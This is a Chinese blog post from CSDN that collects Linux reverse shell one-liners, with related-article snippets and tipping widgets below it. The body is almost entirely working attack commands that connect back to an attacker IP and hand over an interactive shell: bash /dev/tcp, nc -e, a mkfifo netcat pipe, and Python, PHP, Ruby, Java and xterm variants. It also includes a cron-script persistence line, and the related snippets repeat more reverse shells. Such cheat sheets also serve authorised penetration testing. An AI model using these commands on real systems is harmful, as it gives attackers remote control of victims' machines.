linux反弹shell

已于 2022-03-14 18:43:16 修改
阅读量1k 收藏 5
点赞数
分类专栏: 内网 文章标签: linux 服务器 bash
于 2022-02-17 21:58:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/122992621
版权

使用nc对本地端口监听
nc -lvnp 8888

1.bash反弹

bash -i >& /dev/tcp/ip_address/port 0>&1 
bash -c "bash -i >& /dev/tcp/192.168.0.189/6666 0>&1"

计划任务:

echo '/bin/bash -i >& bash -i >&/dev/tcp/1.1.1.1/23333 0>&1' > /tmp/sec.sh

2.nc反弹

nc -e /bin/sh 192.168.2.130 4444

但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

3.python

import socket,subprocess,os 
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(( "192.168.2.130" , 4444 )) 
os.dup2(s.fileno(), 0 ) 
os.dup2(s.fileno(), 1 ) 
os.dup2(s.fileno(), 2 ) 
p = subprocess.call([ "/bin/bash" , "-i" ])

python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1
“,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([”/bin/sh”,"-i"]);’

4.php反弹shell

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

5.ruby反弹shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

6.Java反弹shell

r = Runtime.getRuntime() 
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 
p.waitFor()

7.xterm反弹shell

反弹shell最简单的形式之一就是xterm会话,应在服务器上运行以下命令.它将尝试TCP端口6001上连接你的(10.0.0.1)
 
xterm -display 10.0.0.1:1
 
传入xterm,启动X-Server(1-监听TCP 6001).一种方法使用Xnest(在你系统上运行)
 
Xnest:1
 
你需要在授权目标上连接你
 
xhost + targetip

xterm -display 10.0.0.1:1
明月清风~~
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[渗透测试]反弹shell原理
weixin_47224111的博客
11-23 2749
反弹shell 反弹shell本质就是控制端监听在某TCP/UDP端口,被控制端发起请求到该端口,并将其命令行的输入输出转到控制端 涉及到的基本概念: Linux文件描述符 文件描述符 缩写 描述 0 STDIN 标准输入 1 STDOUT 标准输出 2 STDERR 标准错误输出 在Linux里,所有的东西都是文件,而linux使用文件描述符来标识每个文件对象。包括我们电脑的显示器和键盘,他们都有相应的文件描述符与之对应。 重定向 重定向主要分为两种 输入重定向 &
Linux反弹shell
weixin_64338385的博客
11-26 2269
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
命令执行漏洞
qq_42307546的博客
01-20 1462
命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
反弹shell方式汇总
最新发布
yj520400的博客
04-09 438
攻击机:目标机:或者保存为lltest_tcp.ps1文件WebClient).lltest_tcp.ps1 如下:function$clientSocketsTCPClient'[host]'[port]$stream$clientGetStream();
Linux命令——bash
weixin_34007906的博客
11-12 469
bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell! 基本使用语法 1 bash-c命令 1 2 3 root@kali:~#bash-cwhoami root root@kali:~# 另外使用-i表示以交互方式运...
Linux常用命令
hangoer的博客
08-28 704
命令格式的说明 命令格式:命令 [-选项][参数] 参数 eg: [root@qianfeng01 ~]# ls -la /usr 说明: ⼤部分命令遵从该格式 多个选项时,可以⼀起写 eg: [root@qianfeng01 ~]# ls –l –a ls –la 简化选项与完整选项(注:并⾮所有选项都可使⽤完整选项) eg: [root@qianfeng01 ~]# ls –all ls –a 帮助命令:(相当于命令说明书) 帮助命令 man 英⽂:manual 命令路径:/usr/bin/man 执
Bash快速入门指南
Michael Wing's workspace
12-03 598
C语言入门模式的秘密---责任链模式Grunt-beginner前端自动化工具Android面试常客Handler详解   本文由 伯乐在线 - 巽离 翻译, 进林 校稿。未经许可,禁止转载!  英文出处: panix。欢迎加入 翻译小组。 简单shell脚本 !/bin/bash 这一行表明,不管用户选择的是那种交互式shell,该脚本需要使用bash shell来运行。由于
linux下的shell反弹
ITgougou_的博客
10-27 264
linux下的shell反弹设计重定向,文件描述符等内容 01 linux的文件描述符 可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入standard input 0 (默认设备键盘) 标准输出standard output 1(默认设备显示器) 错误输出:error output 2(默认设备显示器) 下面引用先知社区对文件描述符的脑涂:.
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
浅析Linuxbash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
bash常见用法速览
zhanghm1995的博客
05-09 1450
bash中常用系统变量: KaTeX parse error: Expected 'EOF', got '#' at position 6: USER #̲当前用户名 uname -r …(uname -m) #当前机器架构x86_64 $HOME #当前用户home路径 set命令用法: http://www.ruanyifeng.com/blog/2017/11/bash-set.html read函数:当运行到该句时,会等待终端输入,然后读取终端输入内容。 变量的使用 如果要引用一个变量,可以在变量名
彻底理解bash反弹shell
include_heqile的博客
12-15 2520
bash反弹:首先公网主机监听指定端口,然后肉鸡执行bash命令向公网指定端口发送连接请求 公网主机: nc -lvvp 9090 肉鸡执行: bash -i &amp;&gt; /dev/tcp/144.34.164.217/9090 0&gt;&amp;1 其中144.34.164.217为自己的公网主机 对命令的解释: bash -i意为创建一个交互式的bash shell &am...
linux使用nc 反弹shell
qq_30890029的博客
04-20 446
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听:nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell
反弹bash shell解释
-
03-15 679
反弹bash shell
bash】关于shellbash -c 执行命令或者可执行文件
热门推荐
michaelwoshi的博客
08-28 3万+
我们知道 -c 的意思是 command,所以 bash -c 后面应该跟一个 command。 用法:bash -c “cmd string” 通常使用shell去运行脚本,两种方法 bash xxx.sh,另外一种就是bash -c “cmd string” 对于bash -c “cmd string”,我们看看官方的说明解释: 使用bash -c 要注意两点: 1. bash -c "cmd string" 接的是shell命令字符串,用双引号括起来 2. bash -c...
Linux反弹 shell 命令解析
守拙的博客
08-29 550
Linux 反弹 shell 命令 bash -i > /dev/tcp/192.168.139.149/4444 0>&1 各部分代表的意思。
反弹shell命令
Shanfenglan's blog
10-29 2629
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值